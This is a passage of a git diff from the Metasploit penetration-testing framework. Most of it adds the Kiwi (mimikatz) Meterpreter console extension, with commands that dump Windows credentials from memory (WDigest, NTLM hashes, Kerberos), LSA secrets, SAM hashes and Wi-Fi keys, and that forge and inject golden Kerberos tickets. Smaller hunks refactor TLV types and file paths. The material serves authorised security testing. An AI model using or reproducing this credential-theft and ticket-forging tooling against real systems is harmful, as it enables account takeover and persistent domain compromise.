+TLV_TYPE_KIWI_LSA_SECRET_OLD_RAW   = TLV_META_TYPE_RAW    | (TLV_EXTENSIONS + 42)
+
+TLV_TYPE_KIWI_LSA_SAM              = TLV_META_TYPE_GROUP  | (TLV_EXTENSIONS + 50)
+TLV_TYPE_KIWI_LSA_SAM_RID          = TLV_META_TYPE_UINT   | (TLV_EXTENSIONS + 51)
+TLV_TYPE_KIWI_LSA_SAM_USER         = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 52)
+TLV_TYPE_KIWI_LSA_SAM_LMHASH       = TLV_META_TYPE_RAW    | (TLV_EXTENSIONS + 53)
+TLV_TYPE_KIWI_LSA_SAM_NTLMHASH     = TLV_META_TYPE_RAW    | (TLV_EXTENSIONS + 54)
+
+TLV_TYPE_KIWI_KERB_EXPORT          = TLV_META_TYPE_BOOL   | (TLV_EXTENSIONS + 60)
+TLV_TYPE_KIWI_KERB_TKT             = TLV_META_TYPE_GROUP  | (TLV_EXTENSIONS + 61)
+TLV_TYPE_KIWI_KERB_TKT_ENCTYPE     = TLV_META_TYPE_UINT   | (TLV_EXTENSIONS + 62)
+TLV_TYPE_KIWI_KERB_TKT_START       = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 63)
+TLV_TYPE_KIWI_KERB_TKT_END         = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 64)
+TLV_TYPE_KIWI_KERB_TKT_MAXRENEW    = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 65)
+TLV_TYPE_KIWI_KERB_TKT_SERVERNAME  = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 66)
+TLV_TYPE_KIWI_KERB_TKT_SERVERREALM = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 67)
+TLV_TYPE_KIWI_KERB_TKT_CLIENTNAME  = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 68)
+TLV_TYPE_KIWI_KERB_TKT_CLIENTREALM = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 69)
+TLV_TYPE_KIWI_KERB_TKT_FLAGS       = TLV_META_TYPE_UINT   | (TLV_EXTENSIONS + 70)
+TLV_TYPE_KIWI_KERB_TKT_RAW         = TLV_META_TYPE_RAW    | (TLV_EXTENSIONS + 71)
+
+TLV_TYPE_KIWI_WIFI_INT             = TLV_META_TYPE_GROUP  | (TLV_EXTENSIONS + 75)
+TLV_TYPE_KIWI_WIFI_INT_GUID        = TLV_META_TYPE_RAW    | (TLV_EXTENSIONS + 76)
+TLV_TYPE_KIWI_WIFI_INT_STATE       = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 77)
+TLV_TYPE_KIWI_WIFI_INT_DESC        = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 78)
+TLV_TYPE_KIWI_WIFI_PROFILE         = TLV_META_TYPE_GROUP  | (TLV_EXTENSIONS + 79)
+TLV_TYPE_KIWI_WIFI_PROFILE_NAME    = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 80)
+TLV_TYPE_KIWI_WIFI_PROFILE_XML     = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 81)
+
+end
+end
+end
+end
+end
diff --git a/lib/rex/post/meterpreter/extensions/priv/priv.rb b/lib/rex/post/meterpreter/extensions/priv/priv.rb
index c6baae6511..43f2328805 100644
--- a/lib/rex/post/meterpreter/extensions/priv/priv.rb
+++ b/lib/rex/post/meterpreter/extensions/priv/priv.rb
@@ -45,7 +45,7 @@ class Priv < Extension
 
     elevator_name = Rex::Text.rand_text_alpha_lower( 6 )
 
-    elevator_path = ::File.join( Msf::Config.data_directory, "meterpreter", "elevator.#{client.binary_suffix}" )
+    elevator_path = MeterpreterBinaries.path('elevator', client.binary_suffix)
 
     elevator_path = ::File.expand_path( elevator_path )
 
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb b/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb
index a20b0b1993..41fab4d12b 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb
@@ -12,10 +12,10 @@ module Stdapi
 #
 ##
 
-TLV_TYPE_HANDLE             = TLV_META_TYPE_UINT    |  600
+TLV_TYPE_HANDLE             = TLV_META_TYPE_QWORD   |  600
 TLV_TYPE_INHERIT            = TLV_META_TYPE_BOOL    |  601
-TLV_TYPE_PROCESS_HANDLE     = TLV_META_TYPE_UINT    |  630
-TLV_TYPE_THREAD_HANDLE      = TLV_META_TYPE_UINT    |  631
+TLV_TYPE_PROCESS_HANDLE     = TLV_META_TYPE_QWORD   |  630
+TLV_TYPE_THREAD_HANDLE      = TLV_META_TYPE_QWORD   |  631
 TLV_TYPE_PRIVILEGE          = TLV_META_TYPE_STRING  |  632
 
 ##
@@ -100,7 +100,7 @@ PROCESS_EXECUTE_FLAG_DESKTOP          = (1 << 4)
 PROCESS_EXECUTE_FLAG_SESSION          = (1 << 5)
 
 # Registry
-TLV_TYPE_HKEY               = TLV_META_TYPE_UINT    | 1000
+TLV_TYPE_HKEY               = TLV_META_TYPE_QWORD   | 1000
 TLV_TYPE_ROOT_KEY           = TLV_TYPE_HKEY
 TLV_TYPE_BASE_KEY           = TLV_META_TYPE_STRING  | 1001
 TLV_TYPE_PERMISSION         = TLV_META_TYPE_UINT    | 1002
@@ -125,12 +125,12 @@ TLV_TYPE_ENV_GROUP          = TLV_META_TYPE_GROUP   | 1102
 DELETE_KEY_FLAG_RECURSIVE   = (1 << 0)
 
 # Process
-TLV_TYPE_BASE_ADDRESS       = TLV_META_TYPE_UINT    | 2000
+TLV_TYPE_BASE_ADDRESS       = TLV_META_TYPE_QWORD   | 2000
 TLV_TYPE_ALLOCATION_TYPE    = TLV_META_TYPE_UINT    | 2001
 TLV_TYPE_PROTECTION         = TLV_META_TYPE_UINT    | 2002
 TLV_TYPE_PROCESS_PERMS      = TLV_META_TYPE_UINT    | 2003
 TLV_TYPE_PROCESS_MEMORY     = TLV_META_TYPE_RAW     | 2004
-TLV_TYPE_ALLOC_BASE_ADDRESS = TLV_META_TYPE_UINT    | 2005
+TLV_TYPE_ALLOC_BASE_ADDRESS = TLV_META_TYPE_QWORD   | 2005
 TLV_TYPE_MEMORY_STATE       = TLV_META_TYPE_UINT    | 2006
 TLV_TYPE_MEMORY_TYPE        = TLV_META_TYPE_UINT    | 2007
 TLV_TYPE_ALLOC_PROTECTION   = TLV_META_TYPE_UINT    | 2008
@@ -147,16 +147,16 @@ TLV_TYPE_PROCESS_SESSION    = TLV_META_TYPE_UINT    | 2308
 TLV_TYPE_IMAGE_FILE         = TLV_META_TYPE_STRING  | 2400
 TLV_TYPE_IMAGE_FILE_PATH    = TLV_META_TYPE_STRING  | 2401
 TLV_TYPE_PROCEDURE_NAME     = TLV_META_TYPE_STRING  | 2402
-TLV_TYPE_PROCEDURE_ADDRESS  = TLV_META_TYPE_UINT    | 2403
-TLV_TYPE_IMAGE_BASE         = TLV_META_TYPE_UINT    | 2404
+TLV_TYPE_PROCEDURE_ADDRESS  = TLV_META_TYPE_QWORD   | 2403
+TLV_TYPE_IMAGE_BASE         = TLV_META_TYPE_QWORD   | 2404
 TLV_TYPE_IMAGE_GROUP        = TLV_META_TYPE_GROUP   | 2405
 TLV_TYPE_IMAGE_NAME         = TLV_META_TYPE_STRING  | 2406
 
 TLV_TYPE_THREAD_ID          = TLV_META_TYPE_UINT    | 2500
 TLV_TYPE_THREAD_PERMS       = TLV_META_TYPE_UINT    | 2502
 TLV_TYPE_EXIT_CODE          = TLV_META_TYPE_UINT    | 2510
-TLV_TYPE_ENTRY_POINT        = TLV_META_TYPE_UINT    | 2511
-TLV_TYPE_ENTRY_PARAMETER    = TLV_META_TYPE_UINT    | 2512
+TLV_TYPE_ENTRY_POINT        = TLV_META_TYPE_QWORD   | 2511
+TLV_TYPE_ENTRY_PARAMETER    = TLV_META_TYPE_QWORD   | 2512
 TLV_TYPE_CREATION_FLAGS     = TLV_META_TYPE_UINT    | 2513
 
 TLV_TYPE_REGISTER_NAME      = TLV_META_TYPE_STRING  | 2540
@@ -189,7 +189,7 @@ TLV_TYPE_DESKTOP_SCREENSHOT_PE64DLL_BUFFER = TLV_META_TYPE_STRING | 3012
 #
 ##
 TLV_TYPE_EVENT_SOURCENAME   = TLV_META_TYPE_STRING  | 4000
-TLV_TYPE_EVENT_HANDLE       = TLV_META_TYPE_UINT    | 4001
+TLV_TYPE_EVENT_HANDLE       = TLV_META_TYPE_QWORD   | 4001
 TLV_TYPE_EVENT_NUMRECORDS   = TLV_META_TYPE_UINT    | 4002
 
 TLV_TYPE_EVENT_READFLAGS    = TLV_META_TYPE_UINT    | 4003
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/ui.rb b/lib/rex/post/meterpreter/extensions/stdapi/ui.rb
index c8343dbd43..22c8b04adb 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/ui.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/ui.rb
@@ -156,7 +156,7 @@ class UI < Rex::Post::UI
     request.add_tlv( TLV_TYPE_DESKTOP_SCREENSHOT_QUALITY, quality )
     # include the x64 screenshot dll if the host OS is x64
     if( client.sys.config.sysinfo['Architecture'] =~ /^\S*x64\S*/ )
-      screenshot_path = ::File.join( Msf::Config.data_directory, 'meterpreter', 'screenshot.x64.dll' )
+      screenshot_path = MeterpreterBinaries.path('screenshot','x64.dll')
       screenshot_path = ::File.expand_path( screenshot_path )
       screenshot_dll  = ''
       ::File.open( screenshot_path, 'rb' ) do |f|
@@ -166,7 +166,7 @@ class UI < Rex::Post::UI
       request.add_tlv( TLV_TYPE_DESKTOP_SCREENSHOT_PE64DLL_LENGTH, screenshot_dll.length )
     end
     # but allways include the x86 screenshot dll as we can use it for wow64 processes if we are on x64
-    screenshot_path = ::File.join( Msf::Config.data_directory, 'meterpreter', 'screenshot.x86.dll' )
+    screenshot_path = MeterpreterBinaries.path('screenshot','x86.dll')
     screenshot_path = ::File.expand_path( screenshot_path )
     screenshot_dll  = ''
     ::File.open( screenshot_path, 'rb' ) do |f|
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb b/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
index 436446b53b..31a5c1ef6e 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
@@ -18,6 +18,7 @@ class Webcam
 
   include Msf::Post::Common
   include Msf::Post::File
+  include Msf::Post::WebRTC
 
   def initialize(client)
     @client = client
@@ -195,66 +196,6 @@ class Webcam
     end
   end
 
-
-  #
-  # Connects to a video chat session as an answerer
-  #
-  # @param offerer_id [String] The offerer's ID in order to join the video chat
-  # @return void
-  #
-  def connect_video_chat(server, channel, offerer_id)
-    interface = load_interface('answerer.html')
-    api       = load_api_code
-
-    tmp_api = Tempfile.new('api.js')
-    tmp_api.binmode
-    tmp_api.write(api)
-    tmp_api.close
-
-    interface = interface.gsub(/\=SERVER\=/, server)
-    interface = interface.gsub(/\=WEBRTCAPIJS\=/, tmp_api.path)
-    interface = interface.gsub(/\=RHOST\=/, rhost)
-    interface = interface.gsub(/\=CHANNEL\=/, channel)
-    interface = interface.gsub(/\=OFFERERID\=/, offerer_id)
-
-    tmp_interface = Tempfile.new('answerer.html')
-    tmp_interface.binmode
-    tmp_interface.write(interface)
-    tmp_interface.close
-
-    found_local_browser = Rex::Compat.open_webrtc_browser(tmp_interface.path)
-    unless found_local_browser
-      raise RuntimeError, "Unable to find a suitable browser to connect to the target"
-    end
-  end
-
-
-  #
-  # Returns the webcam interface
-  #
-  # @param html_name [String] The filename of the HTML interface (offerer.html or answerer.html)
-  # @return [String] The HTML interface code
-  #
-  def load_interface(html_name)
-    interface_path = ::File.join(Msf::Config.data_directory, 'webcam', html_name)
-    interface_code = ''
-    ::File.open(interface_path) { |f| interface_code = f.read }
-    interface_code
-  end
-
-
-  #
-  # Returns the webcam API
-  #
-  # @return [String] The WebRTC lib code
-  #
-  def load_api_code
-    js_api_path = ::File.join(Msf::Config.data_directory, 'webcam', 'api.js')
-    api = ''
-    ::File.open(js_api_path) { |f| api = f.read }
-    api
-  end
-
 end
 
 end; end; end; end; end; end
diff --git a/lib/rex/post/meterpreter/ui/console.rb b/lib/rex/post/meterpreter/ui/console.rb
index 6fdbc8b3a6..550c37175e 100644
--- a/lib/rex/post/meterpreter/ui/console.rb
+++ b/lib/rex/post/meterpreter/ui/console.rb
@@ -106,6 +106,8 @@ class Console
       log_error("Operation timed out.")
     rescue RequestError => info
       log_error(info.to_s)
+    rescue Rex::AddressInUse => e
+      log_error(e.message)
     rescue ::Errno::EPIPE, ::OpenSSL::SSL::SSLError, ::IOError
       self.client.kill
     rescue  ::Exception => e
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
index 6766ce7e7f..09a63403e9 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
@@ -1,4 +1,5 @@
 # -*- coding: binary -*-
+require 'set'
 require 'rex/post/meterpreter'
 require 'rex/parser/arguments'
 
@@ -314,6 +315,8 @@ class Console::CommandDispatcher::Core
     print_status("Starting IRB shell")
     print_status("The 'client' variable holds the meterpreter client\n")
 
+    session = client
+    framework = client.framework
     Rex::Ui::Text::IrbShell.new(binding).run
   end
 
@@ -413,20 +416,23 @@ class Console::CommandDispatcher::Core
 
     @@load_opts.parse(args) { |opt, idx, val|
       case opt
-        when "-l"
-          exts = []
-          path = ::File.join(Msf::Config.data_directory, 'meterpreter')
+      when "-l"
+        exts = SortedSet.new
+        msf_path = MeterpreterBinaries.metasploit_data_dir
+        gem_path = MeterpreterBinaries.local_dir
+        [msf_path, gem_path].each do |path|
           ::Dir.entries(path).each { |f|
             if (::File.file?(::File.join(path, f)) && f =~ /ext_server_(.*)\.#{client.binary_suffix}/ )
-              exts.push($1)
+              exts.add($1)
             end
           }
-          print(exts.sort.join("\n") + "\n")
+        end
+        print(exts.to_a.join("\n") + "\n")
 
-          return true
-        when "-h"
-          cmd_load_help
-          return true
+        return true
+      when "-h"
+        cmd_load_help
+        return true
       end
     }
 
@@ -459,16 +465,19 @@ class Console::CommandDispatcher::Core
   end
 
   def cmd_load_tabs(str, words)
-    tabs = []
-    path = ::File.join(Msf::Config.data_directory, 'meterpreter')
+    tabs = SortedSet.new
+    msf_path = MeterpreterBinaries.metasploit_data_dir
+    gem_path = MeterpreterBinaries.local_dir
+    [msf_path, gem_path].each do |path|
     ::Dir.entries(path).each { |f|
       if (::File.file?(::File.join(path, f)) && f =~ /ext_server_(.*)\.#{client.binary_suffix}/ )
         if (not extensions.include?($1))
-          tabs.push($1)
+          tabs.add($1)
         end
       end
     }
-    return tabs
+    end
+    return tabs.to_a
   end
 
   def cmd_use(*args)
@@ -728,10 +737,10 @@ class Console::CommandDispatcher::Core
 
     @@write_opts.parse(args) { |opt, idx, val|
       case opt
-        when "-f"
-          src_file = val
-        else
-          cid = val.to_i
+      when "-f"
+        src_file = val
+      else
+        cid = val.to_i
       end
     }
 
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb
new file mode 100644
index 0000000000..628df53d87
--- /dev/null
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb
@@ -0,0 +1,509 @@
+# -*- coding: binary -*-
+require 'rex/post/meterpreter'
+
+module Rex
+module Post
+module Meterpreter
+module Ui
+
+###
+#
+# Kiwi extension - grabs credentials from windows memory.
+#
+# Benjamin DELPY `gentilkiwi`
+# http://blog.gentilkiwi.com/mimikatz
+#
+# extension converted by OJ Reeves (TheColonial)
+#
+###
+class Console::CommandDispatcher::Kiwi
+
+  Klass = Console::CommandDispatcher::Kiwi
+
+  include Console::CommandDispatcher
+
+  #
+  # Name for this dispatcher
+  #
+  def name
+    "Kiwi"
+  end
+
+  #
+  # Initializes an instance of the priv command interaction. This function
+  # also outputs a banner which gives proper acknowledgement to the original
+  # author of the Mimikatz 2.0 software.
+  #
+  def initialize(shell)
+    super
+    print_line
+    print_line
+    print_line("  .#####.   mimikatz 2.0 alpha (#{client.platform}) release \"Kiwi en C\"")
+    print_line(" .## ^ ##.")
+    print_line(" ## / \\ ##  /* * *")
+    print_line(" ## \\ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )")
+    print_line(" '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)")
+    print_line("  '#####'    Ported to Metasploit by OJ Reeves `TheColonial` * * */")
+    print_line
+
+    if (client.platform =~ /x86/) and (client.sys.config.sysinfo['Architecture'] =~ /x64/)
+
+      print_line
+      print_warning "Loaded x86 Kiwi on an x64 architecture."
+    end
+  end
+
+  #
+  # List of supported commands.
+  #
+  def commands
+    {
+      "creds_wdigest"         => "Retrieve WDigest creds",
+      "creds_msv"             => "Retrieve LM/NTLM creds (hashes)",
+      "creds_livessp"         => "Retrieve LiveSSP creds",
+      "creds_ssp"             => "Retrieve SSP creds",
+      "creds_tspkg"           => "Retrieve TsPkg creds",
+      "creds_kerberos"        => "Retrieve Kerberos creds",
+      "creds_all"             => "Retrieve all credentials",
+      "golden_ticket_create"  => "Create a golden kerberos ticket",
+      "kerberos_ticket_use"   => "Use a kerberos ticket",
+      "kerberos_ticket_purge" => "Purge any in-use kerberos tickets",
+      "kerberos_ticket_list"  => "List all kerberos tickets",
+      "lsa_dump"              => "Dump LSA secrets",
+      "wifi_list"             => "List wifi profiles/creds"
+    }
+  end
+
+  #
+  # Invoke the LSA secret dump on thet target.
+  #
+  def cmd_lsa_dump(*args)
+    check_privs
+
+    print_status("Dumping LSA secrets")
+    lsa = client.kiwi.lsa_dump
+
+    # the format of this data doesn't really lend itself nicely to
+    # use within a table so instead we'll dump in a linear fashion
+
+    print_line("Policy Subsystem : #{lsa[:major]}.#{lsa[:minor]}") if lsa[:major]
+    print_line("Domain/Computer  : #{lsa[:compname]}") if lsa[:compname]
+    print_line("System Key       : #{to_hex(lsa[:syskey])}")
+    print_line("NT5 Key          : #{to_hex(lsa[:nt5key])}")
+    print_line
+    print_line("NT6 Key Count    : #{lsa[:nt6keys].length}")
+
+    if lsa[:nt6keys].length > 0
+      lsa[:nt6keys].to_enum.with_index(1) do |k, i|
+        print_line
+        index = i.to_s.rjust(2, ' ')
+        print_line("#{index}. ID           : #{Rex::Text::to_guid(k[:id])}")
+        print_line("#{index}. Value        : #{to_hex(k[:value])}")
+      end
+    end
+
+    print_line
+    print_line("Secret Count     : #{lsa[:secrets].length}")
+    if lsa[:secrets].length > 0
+      lsa[:secrets].to_enum.with_index(1) do |s, i|
+        print_line
+        index = i.to_s.rjust(2, ' ')
+        print_line("#{index}. Name         : #{s[:name]}")
+        print_line("#{index}. Service      : #{s[:service]}") if s[:service]
+        print_line("#{index}. NTLM         : #{to_hex(s[:ntlm])}") if s[:ntlm]
+        if s[:current] || s[:current_raw]
+          current = s[:current] || to_hex(s[:current_raw], ' ')
+          print_line("#{index}. Current      : #{current}")
+        end
+        if s[:old] || s[:old_raw]
+          old = s[:old] || to_hex(s[:old_raw], ' ')
+          print_line("#{index}. Old          : #{old}")
+        end
+      end
+    end
+
+    print_line
+    print_line("SAM Key Count    : #{lsa[:samkeys].length}")
+    if lsa[:samkeys].length > 0
+      lsa[:samkeys].to_enum.with_index(1) do |s, i|
+        print_line
+        index = i.to_s.rjust(2, ' ')
+        print_line("#{index}. RID          : #{s[:rid]}")
+        print_line("#{index}. User         : #{s[:user]}")
+        print_line("#{index}. LM Hash      : #{to_hex(s[:lm_hash])}")
+        print_line("#{index}. NTLM Hash    : #{to_hex(s[:ntlm_hash])}")
+      end
+    end
+
+    print_line
+  end
+
+  #
+  # Valid options for the golden ticket creation functionality.
+  #
+  @@golden_ticket_create_opts = Rex::Parser::Arguments.new(
+    "-h" => [ false, "Help banner" ],
+    "-u" => [ true,  "Name of the user to create the ticket for" ],
+    "-i" => [ true,  "ID of the user to associate the ticket with" ],
+    "-g" => [ true,  "Comma-separated list of group identifiers to include (eg: 501,502)" ],
+    "-d" => [ true,  "Name of the target domain (FQDN)" ],
+    "-k" => [ true,  "krbtgt domain user NTLM hash" ],
+    "-t" => [ true,  "Local path of the file to store the ticket in" ],
+    "-s" => [ true,  "SID of the domain" ]
+  )
+
+  #
+  # Output the usage for the ticket listing functionality.
+  #
+  def golden_ticket_create_usage
+    print(
+      "\nUsage: golden_ticket_create [-h] -u <user> -d <domain> -k <krbtgt_ntlm> -s <sid> -t <path> [-i <id>] [-g <groups>]\n\n" +
+      "Create a golden kerberos ticket that expires in 10 years time.\n\n" +
+      @@golden_ticket_create_opts.usage)
+  end
+
+  #
+  # Invoke the golden kerberos ticket creation functionality on the target.
+  #
+  def cmd_golden_ticket_create(*args)
+    if args.include?("-h")
+      golden_ticket_create_usage
+      return
+    end
+
+    user = nil
+    domain = nil
+    sid = nil
+    tgt = nil
+    target = nil
+    id = 0
+    group_ids = []
+
+    @@golden_ticket_create_opts.parse(args) { |opt, idx, val|
+      case opt
+      when "-u"
+        user = val
+      when "-d"
+        domain = val
+      when "-k"
+        tgt = val
+      when "-t"
+        target = val
+      when "-i"
+        id = val.to_i
+      when "-g"
+        group_ids = val.split(',').map { |g| g.to_i }.to_a
+      when "-s"
+        sid = val
+      end
+    }
+
+    # all parameters are required
+    unless user && domain && sid && tgt && target
+      golden_ticket_create_usage
+      return
+    end
+
+    ticket = client.kiwi.golden_ticket_create(user, domain, sid, tgt, id, group_ids)
+
+    ::File.open( target, 'wb' ) do |f|
+      f.write ticket
+    end
+
+    print_good("Golden Kerberos ticket written to #{target}")
+  end
+
+  #
+  # Valid options for the ticket listing functionality.
+  #
+  @@kerberos_ticket_list_opts = Rex::Parser::Arguments.new(
+    "-h" => [ false, "Help banner" ],
+    "-e" => [ false, "Export Kerberos tickets to disk" ],
+    "-p" => [ true,  "Path to export Kerberos tickets to" ]
+  )
+
+  #
+  # Output the usage for the ticket listing functionality.
+  #
+  def kerberos_ticket_list_usage
+    print(
+      "\nUsage: kerberos_ticket_list [-h] [-e <true|false>] [-p <path>]\n\n" +
+      "List all the available Kerberos tickets.\n\n" +
+      @@kerberos_ticket_list_opts.usage)
+  end
+
+  #
+  # Invoke the kerberos ticket listing functionality on the target machine.
+  #
+  def cmd_kerberos_ticket_list(*args)
+    if args.include?("-h")
+      kerberos_ticket_list_usage
+      return
+    end
+
+    # default to not exporting
+    export = false
+    # default to the current folder for dumping tickets
+    export_path = "."
+
+    @@kerberos_ticket_list_opts.parse(args) { |opt, idx, val|
+      case opt
+      when "-e"
+        export = true
+      when "-p"
+        export_path = val
+      end
+    }
+
+    tickets = client.kiwi.kerberos_ticket_list(export)
+
+    fields = ['Server', 'Client', 'Start', 'End', 'Max Renew', 'Flags']
+    fields << 'Export Path' if export
+
+    table = Rex::Ui::Text::Table.new(
+      'Header'    => "Kerberos Tickets",
+      'Indent'    => 0,
+      'SortIndex' => 0,
+      'Columns'   => fields
+    )
+
+    tickets.each do |t|
+      flag_list = client.kiwi.to_kerberos_flag_list(t[:flags]).join(", ")
+      values = [
+        "#{t[:server]} @ #{t[:server_realm]}",
+        "#{t[:client]} @ #{t[:client_realm]}",
+        t[:start],
+        t[:end],
+        t[:max_renew],
+        "#{t[:flags].to_s(16).rjust(8, '0')} (#{flag_list})"
+      ]
+
+      # write out each ticket to disk if export is enabled.
+      if export
+        path = "<no data retrieved>"
+        if t[:raw]
+          id = "#{values[0]}-#{values[1]}".gsub(/[\\\/\$ ]/, '-')
+          file = "kerb-#{id}-#{Rex::Text.rand_text_alpha(8)}.tkt"
+          path = ::File.expand_path(File.join(export_path, file))
+          ::File.open(path, 'wb') do |x|
+            x.write t[:raw]
+          end
+        end
+        values << path
+      end
+
+      table << values
+    end
+
+    print_line
+    print_line(table.to_s)
+    print_line("Total Tickets : #{tickets.length}")
+  end
+
+  #
+  # Invoke the kerberos ticket purging functionality on the target machine.
+  #
+  def cmd_kerberos_ticket_purge(*args)
+    client.kiwi.kerberos_ticket_purge
+    print_good("Kerberos tickets purged")
+  end
+
+  #
+  # Use a locally stored Kerberos ticket in the current session.
+  #
+  def cmd_kerberos_ticket_use(*args)
+    if args.length != 1
+      print_line("Usage: kerberos_ticket_use ticketpath")
+      return
+    end
+
+    target = args[0]
+    ticket  = ''
+    ::File.open(target, 'rb') do |f|
+      ticket += f.read(f.stat.size)
+    end
+
+    print_status("Using Kerberos ticket stored in #{target}, #{ticket.length} bytes")
+    client.kiwi.kerberos_ticket_use(ticket)
+    print_good("Kerberos ticket applied successfully")
+  end
+
+  def wifi_list_usage
+    print(
+      "\nUsage: wifi_list\n\n" +
+      "List WiFi interfaces, profiles and passwords.\n\n")
+  end
+
+  #
+  # Dump all the wifi profiles/credentials
+  #
+  def cmd_wifi_list(*args)
+    # if any arguments are specified, then fire up a usage message
+    if args.length > 0
+      wifi_list_usage
+      return
+    end
+
+    results = client.kiwi.wifi_list
+
+    if results.length > 0
+      results.each do |r|
+        table = Rex::Ui::Text::Table.new(
+          'Header'    => "#{r[:desc]} - #{r[:guid]}",
+          'Indent'    => 0,
+          'SortIndex' => 0,
+          'Columns'   => [
+            'Name', 'Auth', 'Type', 'Shared Key'
+          ]
+        )
+
+        print_line
+        r[:profiles].each do |p|
+          table << [p[:name], p[:auth], p[:key_type], p[:shared_key]]
+        end
+
+        print_line table.to_s
+        print_line "State: #{r[:state]}"
+      end
+    else
+      print_line
+      print_error("No wireless profiles found on the target.")
+    end
+
+    print_line
+    return true
+  end
+
+  #
+  # Dump all the possible credentials to screen.
+  #
+  def cmd_creds_all(*args)
+    method = Proc.new { client.kiwi.all_pass }
+    scrape_passwords("all", method)
+  end
+
+  #
+  # Dump all wdigest credentials to screen.
+  #
+  def cmd_creds_wdigest(*args)
+    method = Proc.new { client.kiwi.wdigest }
+    scrape_passwords("wdigest", method)
+  end
+
+  #
+  # Dump all msv credentials to screen.
+  #
+  def cmd_creds_msv(*args)
+    method = Proc.new { client.kiwi.msv }
+    scrape_passwords("msv", method)
+  end
+
+  #
+  # Dump all LiveSSP credentials to screen.
+  #
+  def cmd_creds_livessp(*args)
+    method = Proc.new { client.kiwi.livessp }
+    scrape_passwords("livessp", method)
+  end
+
+  #
+  # Dump all SSP credentials to screen.
+  #
+  def cmd_creds_ssp(*args)
+    method = Proc.new { client.kiwi.ssp }
+    scrape_passwords("ssp", method)
+  end
+
+  #
+  # Dump all TSPKG credentials to screen.
+  #
+  def cmd_creds_tspkg(*args)
+    method = Proc.new { client.kiwi.tspkg }
+    scrape_passwords("tspkg", method)
+  end
+
+  #
+  # Dump all Kerberos credentials to screen.
+  #
+  def cmd_creds_kerberos(*args)
+    method = Proc.new { client.kiwi.kerberos }
+    scrape_passwords("kerberos", method)
+  end
+
+protected
+
+  def check_privs
+    if system_check
+      print_good("Running as SYSTEM")
+    else
+      print_warning("Not running as SYSTEM, execution may fail")
+    end
+  end
+
+  def system_check
+    unless (client.sys.config.getuid == "NT AUTHORITY\\SYSTEM")
+      print_warning("Not currently running as SYSTEM")
+      return false
+    end
+
+    return true
+  end
+
+  #
+  # Invoke the password scraping routine on the target.
+  #
+  # @param provider [String] The name of the type of credentials to dump
+  #   (used for display purposes only).
+  # @param method [Proc] Block that calls the method that invokes the
+  #   appropriate function on the client that returns the results from
+  #   Meterpreter that lay in the house that Jack built.
+  #
+  # @return [void]
+  def scrape_passwords(provider, method)
+    check_privs
+    print_status("Retrieving #{provider} credentials")
+    accounts = method.call
+
+    table = Rex::Ui::Text::Table.new(
+      'Header'    => "#{provider} credentials",
+      'Indent'    => 0,
+      'SortIndex' => 0,
+      'Columns'   =>
+      [
+        'Domain', 'User', 'Password', 'Auth Id', 'LM Hash', 'NTLM Hash'
+      ]
+    )
+
+    accounts.each do |acc|
+      table << [
+        acc[:domain] || "",
+        acc[:username] || "",
+        acc[:password] || "",
+        "#{acc[:auth_hi]} ; #{acc[:auth_lo]}",
+        to_hex(acc[:lm] || ""),
+        to_hex(acc[:ntlm] || "")
+      ]
+    end
+
+    print_line table.to_s
+    return true
+  end
+
+  #
+  # Helper function to convert a potentially blank value to hex and have
+  # the outer spaces stripped
+  #
+  # @param (see Rex::Text.to_hex)
+  # @return [String] The result of {Rex::Text.to_hex}, strip'd
+  def to_hex(value, sep = '')
+    value ||= ""
+    Rex::Text.to_hex(value, sep).strip
+  end
+
+end
+
+end
+end
+end
+end
+
diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb
index d29e677839..b8efa19929 100644
--- a/lib/rex/proto/http/client.rb
+++ b/lib/rex/proto/http/client.rb
@@ -480,7 +480,7 @@ class Client
     opts['headers']||= {}
 
     ntlmssp_flags = ::Rex::Proto::NTLM::Utils.make_ntlm_flags(ntlm_options)
-    workstation_name = Rex::Text.rand_text_alpha(rand(8)+1)
+    workstation_name = Rex::Text.rand_text_alpha(rand(8)+6)
     domain_name = self.config['domain']
 
     b64_blob = Rex::Text::encode_base64(
diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb
index e67da387f2..e2d425c6c9 100644
--- a/lib/rex/proto/http/client_request.rb
+++ b/lib/rex/proto/http/client_request.rb
@@ -40,7 +40,7 @@ class ClientRequest
     #
     'encode_params'          => true,
     'encode'                 => false,
-    'uri_encode_mode'        => 'hex-normal', # hex-all, hex-random, u-normal, u-random, u-all
